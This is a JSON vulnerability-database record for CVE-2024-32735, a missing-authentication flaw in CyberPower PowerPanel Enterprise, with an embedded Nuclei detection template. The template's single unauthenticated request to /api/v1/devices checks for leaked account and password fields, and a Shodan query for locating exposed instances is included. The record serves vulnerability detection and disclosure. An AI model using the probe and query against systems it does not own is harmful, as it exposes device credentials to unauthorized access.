{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2024-32735/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2024-32735/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2024-32735/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2024-32735/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2024-32735/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2024-32735"},"sightings":{"href":"/api/v1/sightings/cve-2024-32735"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2024/CVE-2024-32735.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2024-32735\n\ninfo:\n  name: CyberPower - Missing Authentication\n  author: DhiyaneshDK\n  severity: critical\n  description: |\n    An issue regarding missing authentication for certain utilities exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n  remediation: |\n    Apply the latest security patches and updates from the vendor to address this vulnerability.\n  impact: |\n    An unauthenticated remote attacker can access the PDNU REST APIs, which may result in compromise of the application.\n  reference:\n    - https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote\n    - https://www.tenable.com/security/research/tra-2024-14\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-32735\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2024-32735\n    cwe-id: CWE-306\n    epss-score: 0.06765\n    epss-percentile: 0.93686\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"<title>PDNU</title>\"\n  tags: cve,cve2024,cyberpower,auth-bupass,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/v1/devices\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"account\":'\n          - '\"passwd\":'\n          - 'status\":\"success'\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - 'application/json'\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502210086cc556d641eef0c2653979ddc3cf29f8de6d39b1c2cd982189da0c5577bb5be022029a2932a9037e87aa6509ab89e067952d27984e7f491e42ae9412f3b1582697b:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2024-32735"}